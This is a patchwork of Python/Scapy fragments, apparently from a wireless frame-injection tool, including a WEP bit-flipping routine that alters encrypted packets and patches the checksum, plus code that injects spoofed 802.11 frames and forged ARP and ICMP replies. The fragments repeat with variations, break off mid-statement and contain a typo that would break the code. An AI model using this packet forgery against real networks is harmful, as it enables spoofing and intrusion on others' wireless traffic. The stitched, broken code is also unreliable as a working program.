def flip_bits(self, packet): wepdata = packet[Dot11WEP].wepdata # Skip first 4 bytes corresponding to IV and KeyID # The ICV is included in the cyphertext and corresponds to the last 4 bytes cyphertext = str(packet[Dot11WEP])[4:] flipped_packet = packet.copy() # Preserve the original wep packet # Create bitmask with same size as the encrypted wepdata, excluding the ICV bitmask = list('\x00' * len(wepdata)) # Flip bits of the bitmask corresponding to the last byte of sender MAC and IP respectively bitmask[len(wepdata) - 15] = chr(randint(0, 255)) bitmask[len(wepdata) - 11] = chr(randint(0, 255)) # Create crc32 checksum for the bitmask icv_patch = calc_crc32(bitmask) icv_patch_bytes = pack("<I", icv_patch) final_bitmask = bitmask + list(icv_patch_bytes) # Append the ICV patch to the bitmask data # Now apply the 'patch' to the wepdata and the icv by XORing the final_bitmask with the original cyphertext flipped_result = [ chr( ord(cyphertext[i]) ^ ord(final_bitmask[i]) ) for i in range(len(cyphertext)) ] final_result = str(packet[Dot11WEP])[:4] + "".join(flipped_result) # Put the results back in the packet flipped_packet[Dot11WEP] = Dot11WEP(final_result) # Now lets change the 802.11 information header to make it look like it came from a client. flipped_packet[Dot11].FCfield = "from-DS+retry+wep" flipped_packet[Dot11].addr1 = "ff:ff:ff:ff:ff:ff" flipped_packet[Dot11].addr3 = (packet[Dot11].addr2[:-2] + "%02x") % randint(0, 255) flipped_packet[Dot11].addr2 = self.ap_bssid return flipped_packet
def handle_read(self):
    """Bridge one frame read from the tap device onto the 802.11 side.

    A tap read is laid out as::

        | 4 bytes | 4 bytes | 18 bytes     | 1500 bytes |
          Tap       VLAN     Ether header   Frame

    The leading 4 bytes are stripped before the Ethernet frame is parsed.
    The frame is then re-encapsulated as a from-DS 802.11 data frame (with an
    optional Dot11WEP layer) and injected with ``sendp``.

    Reads ``self._tap.bssid``, ``self._tap.smac``, ``self._tap.has_wep`` and
    ``self._tap.key_id``; the radiotap header comes from ``self.radiotap()``.
    """
    raw = self.read(1526)
    eth = Ether(raw[4:]).getlayer(Ether)

    # Data frame from the distribution system, addressed to the Ethernet
    # destination and sourced from the tap's BSSID.
    frame = self.radiotap() / Dot11(
        type="Data",
        FCfield="from-DS",
        addr1=eth.dst,
        addr2=self._tap.bssid,
    )
    # The tun/tap MAC cannot be set when the interface is created, so the
    # source address is taken from the configured smac, or from the Ethernet
    # source when no smac was configured.
    frame.addr3 = eth.src if self._tap.smac == '' else self._tap.smac

    if self._tap.has_wep:
        frame.FCfield |= 0x40  # Protected Frame bit
        # NOTE(review): the IV is a fixed constant, so every injected frame is
        # encrypted under the same IV/key pair, i.e. the same keystream; WEP
        # expects a per-frame IV.  Not changed here because it alters on-air
        # behaviour, but worth fixing.
        frame /= Dot11WEP(iv="111", keyid=self._tap.key_id)

    frame /= LLC(ctrl=3) / SNAP(code=eth.type) / eth.payload
    sendp(frame, verbose=0)  # inject the from-DS frame
"Received ARP Request on %s\n" % options.in_iface) if optios.verb: os.write(1, "%s\n" % dot11_frame.summary()) # Building ARP Reply answer for injection dot11_answer = RadioTap() / Dot11( type="Data", FCfield="from-DS", addr1=dot11_frame.getlayer(Dot11).addr2, addr2=options.bssid) dot11_answer.addr3 = options.smac if options.wepkey is not None: dot11_answer.FCfield |= 0x40 dot11_answer /= Dot11WEP(iv="111", keyid=options.keyid) dot11_answer /= LLC(ctrl=3) / SNAP() / ARP( op="is-at", hwsrc=options.smac, psrc=dot11_frame.getlayer(ARP).pdst, hwdst=dot11_frame.getlayer(ARP).hwsrc, pdst=dot11_frame.getlayer(ARP).psrc) dot11_answer /= dot11_frame.getlayer(ARP).payload if options.debug: os.write(1, "Sending ARP Reply on %s\n" % optios.out_iface) if options.verb: os.write(1, "%s\n" % dot11_answer.summary())
# Prepare Dot11 frame for injection dot11_sent_frame = RadioTap() / Dot11( type="Data", FCfield="from-DS", addr1=eth_rcvd_frame.getlayer(Ether).dst, addr2=BSSID) # It doesn't seem possible to set tuntap interface MAC address # when we create it, so we set source MAC here if not HAS_SMAC: dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src else: dot11_sent_frame.addr3 = SMAC if WEP: dot11_sent_frame.FCfield |= 0x40 dot11_sent_frame /= Dot11WEP(iv="111", keyid=KEYID) dot11_sent_frame /= LLC(ctrl=3) / SNAP( code=eth_rcvd_frame.getlayer( Ether).type) / eth_rcvd_frame.getlayer(Ether).payload if DEBUG: os.write(1, "Sending from-DS to %s\n" % OUT_IFACE) if VERB: os.write(1, "%s\n" % dot11_sent_frame.summary()) # Frame injection : sendp(dot11_sent_frame, verbose=0) # Send from-DS frame # Frame from WiFi network if s in r:
# Prepare Dot11 frame for injection dot11_sent_frame = RadioTap() / Dot11( type="Data", FCfield="from-DS", addr1=eth_rcvd_frame.getlayer(Ether).dst, addr2=options.bssid) # It doesn't seem possible to set tuntap interface MAC address # when we create it, so we set source MAC here if options.smac is None: dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src else: dot11_sent_frame.addr3 = options.smac if options.wepkey is not None: dot11_sent_frame.FCfield |= 0x40 dot11_sent_frame /= Dot11WEP(iv="111", keyid=options.keyid) dot11_sent_frame /= LLC(ctrl=3) / SNAP( code=eth_rcvd_frame.getlayer( Ether).type) / eth_rcvd_frame.getlayer(Ether).payload if options.debug: os.write(1, "Sending from-DS to %s\n" % options.out_iface) if options.verb: os.write(1, "%s\n" % dot11_sent_frame.summary()) # Frame injection : sendp(dot11_sent_frame, verbose=0) # Send from-DS frame # Frame from WiFi network if s in r:
if VERB: os.write(1, "%s\n" % dot11_frame.summary()) # Building ICMP Echo Reply answer for injection dot11_answer = RadioTap() / Dot11( type="Data", FCfield="from-DS", addr1=dot11_frame.getlayer(Dot11).addr2, addr2=BSSID) if not HAS_SMAC: dot11_answer.addr3 = dot11_frame.getlayer(Dot11).addr1 else: dot11_answer.addr3 = SMAC if WEP: dot11_answer.FCfield |= 0x40 dot11_answer /= Dot11WEP(iv="111", keyid=KEYID) dot11_answer /= LLC(ctrl=3) / SNAP() / IP( src=dot11_frame.getlayer(IP).dst, dst=dot11_frame.getlayer(IP).src, ttl=TTL) dot11_answer /= ICMP(type="echo-reply", id=dot11_frame.getlayer(ICMP).id, seq=dot11_frame.getlayer(ICMP).seq) dot11_answer /= dot11_frame.getlayer(ICMP).payload if DEBUG: os.write(1, "Sending ICMP Echo Reply on %s\n" % OUT_IFACE) if VERB: os.write(1, "%s\n" % dot11_answer.summary()) # Frame injection :